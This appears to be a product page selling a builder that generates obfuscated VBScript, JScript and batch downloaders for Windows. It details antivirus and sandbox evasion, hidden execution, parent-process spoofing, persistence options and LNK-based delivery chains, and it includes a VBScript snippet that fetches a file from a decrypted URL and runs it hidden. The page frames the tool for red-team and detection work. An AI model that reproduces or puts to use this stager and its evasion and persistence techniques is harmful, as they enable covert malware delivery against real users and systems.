The Script Builder produces text artifacts in three classic formats — .vbs, .js (JScript), and .bat — each handled by a long-shipped, fully-trusted Windows host: Windows Script Host (wscript.exe/cscript.exe) for VBS and JS, and cmd.exe for batch.
Because the artifact is plain text, there is no PE structure for static AV to fingerprint. Detection must rely on lexical/behavioral analysis of the script itself — and the builder layers obfuscation, string encryption, and dynamic dispatch to make signature-based rules brittle.
WindowStyle = 0 (vbHide)Supply a local PE or a hosted URL. Builder selects embedded or stager mode automatically based on size.
Choose .vbs, .js, or .bat — or build all three for fan-out delivery.
Pick obfuscation level, decoy behavior, anti-sandbox checks, and persistence options.
Output is a single-file script. Double-click, drop into archive, or chain after an LNK.
Uses WScript.Shell, MSXML2.XMLHTTP, and ADODB.Stream for download + write, then Run for execution. Optional WMI spawning for parent-process spoofing.
JScript via cscript.exe //E:JScript or wscript.exe. Same COM stack as VBS but different lexical signature — useful when VBS is blocked by policy.
Pure .bat with powershell/certutil/curl/bitsadmin sub-commands. Useful in environments where WSH is disabled but cmd is whitelisted.
Every build randomizes: variable names, comment lines, string-split points, control-flow order, and decoy operations. Two consecutive builds share no static signature.
Per-build XOR/AES key embedded as constants. URLs, command names, and decoy text are decrypted at runtime — no plain-text IOCs in the file.
Optional checks: cursor movement, recent documents count, mouse-position drift, hostname pattern, uptime threshold. Quiet exit on detection.
' Decrypt URL constants Dim u : u = Dec("d3ab...c2", k) Dim p : p = CreateObject("MSXML2.XMLHTTP.6.0") p.Open "GET", u, False : p.Send Dim s : Set s = CreateObject("ADODB.Stream") s.Type = 1 : s.Open : s.Write p.responseBody s.SaveToFile tmp, 2 CreateObject("WScript.Shell").Run tmp, 0, False
| Output Formats | .vbs (VBScript) · .js (JScript) · .bat (Cmd batch) |
|---|---|
| OS Compatibility | Windows XP / 7 / 8.1 / 10 / 11 (WSH ships by default) |
| Execution Hosts | wscript.exe · cscript.exe · cmd.exe |
| Delivery Mode | URL stager (HTTPS via XMLHTTP) · Local embed (Base64 + AES in script body) |
| Obfuscation | String encryption · Variable randomization · Control-flow shuffling · Comment injection |
| Window Behavior | Hidden (vbHide / SW_HIDE) |
| Anti-Analysis | Cursor activity · Recent docs · Hostname filter · Uptime gating |
| Decoy | Optional drop-and-open of benign document during execution |
| Persistence | Run-key, scheduled task, startup folder (configurable) |
VBS/JS attachments in authorized phishing simulations — measure gateway filtering and end-user click behavior.
Use as second stage from a LOLBin-targeted LNK: LNK › cmd › script fetched and executed.
Generate samples to validate WSH telemetry, AMSI integration, and behavioral rules around wscript.exe spawning network children.
Study how various sandboxes handle WSH artifacts and which anti-analysis primitives evade detonation.
Demonstrate why "double-clicking that script" is dangerous, with measurable simulated outcomes.
Reproduce TTPs from VBS-heavy campaigns (Kimsuky, MuddyWater, FIN11) for purple-team validation.
All tiers include unlimited builds across VBS / JS / BAT, full obfuscation engine, and updates within the term.
Bundle option. Need multiple builders? The All Modules Bundle covers every builder + both launchers at a steep discount.
Pick a tier above or talk to us — we'll match the right configuration to your engagement.
